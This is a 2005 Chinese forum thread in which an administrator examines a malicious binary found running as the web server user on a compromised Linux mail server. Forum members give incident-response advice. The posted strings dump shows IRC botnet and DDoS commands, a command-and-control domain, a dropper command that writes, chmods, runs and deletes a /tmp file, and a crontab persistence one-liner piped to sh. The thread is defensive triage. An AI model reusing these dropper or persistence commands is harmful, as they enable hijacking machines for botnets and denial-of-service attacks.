免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
论坛 IT运维 数据安全 Linux服务器有问题。大量带宽被耗尽。
12
最近访问板块 发新帖
楼主: arbor
打印 上一主题 下一主题

Linux服务器有问题。大量带宽被耗尽。 [复制链接]

arbor

论坛徽章:
0
11 [报告]
发表于 2005-09-22 08:43 |只看该作者

Linux服务器有问题。大量带宽被耗尽。

原帖由 "ayazero" 发表:
cp /proc/399/exe /tmp/399.bak

file 399.bak

strace ./399.bak
strings ./399.bak >; printable

[root@mail root]# cd /proc/4236/
[root@mail 4236]# ll
total 0
-r--r--r--    1 apache   apache          0 Sep 22 08:35 cmdline
-r--r--r--    1 apache   apache          0 Sep 22 08:35 cpu
lrwxrwxrwx    1 apache   apache          0 Sep 22 08:35 cwd ->; /
-r--------    1 apache   apache          0 Sep 22 08:35 environ
lrwxrwxrwx    1 apache   apache          0 Sep 22 08:35 exe ->; /tmp/upxBL3TRWLAEEL (deleted)
dr-x------    2 apache   apache          0 Sep 22 08:35 fd
-r--r--r--    1 apache   apache          0 Sep 22 08:35 maps
-rw-------    1 apache   apache          0 Sep 22 08:35 mem
-r--r--r--    1 apache   apache          0 Sep 22 08:35 mounts
lrwxrwxrwx    1 apache   apache          0 Sep 22 08:35 root ->; /
-r--r--r--    1 apache   apache          0 Sep 22 08:35 stat
-r--r--r--    1 apache   apache          0 Sep 22 08:35 statm
-r--r--r--    1 apache   apache          0 Sep 22 08:35 status
[root@mail 4236]# cp exe /tmp/evil.bak
[root@mail 4236]# file /tmp/evil.bak
/tmp/evil.bak: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), stripped
[root@mail 4236]# whereis strace
strace:
[root@mail 4236]# whereis strings
strings: /usr/bin/strings /usr/include/strings.h /usr/share/man/man1/strings.1.gz
[root@mail 4236]# strings /tmp/evil.bak
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
longjmp
unsetenv
waitpid
recv
connect
memmove
snprintf
getenv
memmem
__strtol_internal
execl
__cxa_finalize
dup2
feof
sleep
vsnprintf
socket
select
strncasecmp
send
chmod
alarm
fprintf
kill
__deregister_frame_info
chdir
strstr
rand
signal
strncmp
unlink
setenv
strcasecmp
sendto
_IO_getc
fork
execlp
inet_aton
memset
srand
inet_ntoa
time
gethostbyname
fgetc
fclose
fwrite
__errno_location
exit
fopen
_setjmp
_IO_stdin_used
__libc_start_main
open
strchr
fcntl
__register_frame_info
close
GLIBC_2.1.3
GLIBC_2.1
GLIBC_2.0
PTRh`
F       H<
uvRj
[^_]
<it6<i
8<st
<uu0
[^_]
_Xj:
t7Rj
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
Ht=
[^_]
ZYPh
ZYPh
ZYPPPPh
[^_]
XZht
www2.fuck-j00.info
65000
httpd
/usr/bin/ping
NOTICE %s :invalid timeout
NOTICE %s :invalid port #%d
NOTICE %s :invalid ip #%d
NOTICE %s :invalid type #%d
NOTICE %s :too many targets
NOTICE %s :starting...
/tmp/%s
HTTP/1.1 200 OK
HTTP/1.0 200 OK
Content-Length:
Content-length:
content-length:
cront4b
JOIN #crew
MODE %s +iw
NICK %s
pwned.luser
dos
0.25
NOTICE %s :version %s
stop
NOTICE %s :stopped
uninstall
NOTICE %s :what?
PRIVMSG
ERROR
Too many user connections
Too many host connections
PING
PONG%s
PING :*
PASS %s
\%03o
/usr/bin/crontab
/dev/urandom
/dev/null
NOTICE %s :too few parameters
NOTICE %s :invalid target #%d
NOTICE %s :invalid prefix #%d
GET /%s HTTP/1.0
Host: %s
USER %s localhost 0 :*Unknown*
" >; /tmp/%s ; chmod 700 /tmp/%s ; /tmp/%s x ; rm -f /tmp/%s
%d * * * * /bin/echo `crontab -l|grep '.\{666\}'|sed 's/^./echo -e -n/'`|sh
[root@mail 4236]# ldd /tmp/evil.bak
        libc.so.6 =>; /lib/i686/libc.so.6 (0x42000000)
        /lib/ld-linux.so.2 =>; /lib/ld-linux.so.2 (0x40000000)
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
ayazero

论坛徽章:
0
12 [报告]
发表于 2005-09-22 09:21 |只看该作者

Linux服务器有问题。大量带宽被耗尽。

应该就是worm,可能从www2.fuck-j00.info这个临时域名下载程序到本机,然后扫描其他机器
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
ayazero

论坛徽章:
0
13 [报告]
发表于 2005-09-22 09:24 |只看该作者

Linux服务器有问题。大量带宽被耗尽。

也可能是被人入侵了,重装系统,加固一下就行了,没必要再花时间关心那个程序了
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
arbor

论坛徽章:
0
14 [报告]
发表于 2005-09-22 09:25 |只看该作者

Linux服务器有问题。大量带宽被耗尽。

[quote]原帖由 "ayazero"]应该就是worm,可能从www2.fuck-j00.info这个临时域名下载程序到本机,然后扫描其他机器[/quote 发表:


用iptables阻止这个域名就可以了吗?有没有有没有更好、更彻底的解决办法?
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
ayazero

论坛徽章:
0
15 [报告]
发表于 2005-09-22 09:28 |只看该作者

Linux服务器有问题。大量带宽被耗尽。

恕我没有时间,更没有兴趣教人step by step,自己google找些资料吧
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
arbor

论坛徽章:
0
16 [报告]
发表于 2005-09-22 09:42 |只看该作者

Linux服务器有问题。大量带宽被耗尽。

[quote]原帖由 "ayazero"]恕我没有时间,更没有兴趣教人step by step,自己google找些资料吧[/quote 发表:


已经很感激了,谢谢!
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
老蒋

论坛徽章:
0
17 [报告]
发表于 2005-09-24 09:17 |只看该作者

Linux服务器有问题。大量带宽被耗尽。

[quote]原帖由 "ayazero"]恕我没有时间,更没有兴趣教人step by step,自己google找些资料吧[/quote 发表:


绿×××的就是NB
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
ayazero

论坛徽章:
0
18 [报告]
发表于 2005-09-25 17:43 |只看该作者

Linux服务器有问题。大量带宽被耗尽。

抱歉,工作忙,情绪有点暴躁

最好是有strace的结果,不过我想分析这个程序意义不大,至于如何加固似乎也不是三言两语能说清楚的,能google到的文章虽然不是最好的,不过多少也能解决点问题

把你的crond服务停掉
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
arbor

论坛徽章:
0
19 [报告]
发表于 2005-09-25 21:07 |只看该作者

Linux服务器有问题。大量带宽被耗尽。

[quote]原帖由 "ayazero" 发表:
抱歉,工作忙,情绪有点暴躁

最好是有strace的结果,不过我想分析这个程序意义不大,至于如何加固似乎也不是三言两语能说清楚的,能google到的文章虽然不是最好的,不过多少也能解决点问题

把你的crond服务停
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
12
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP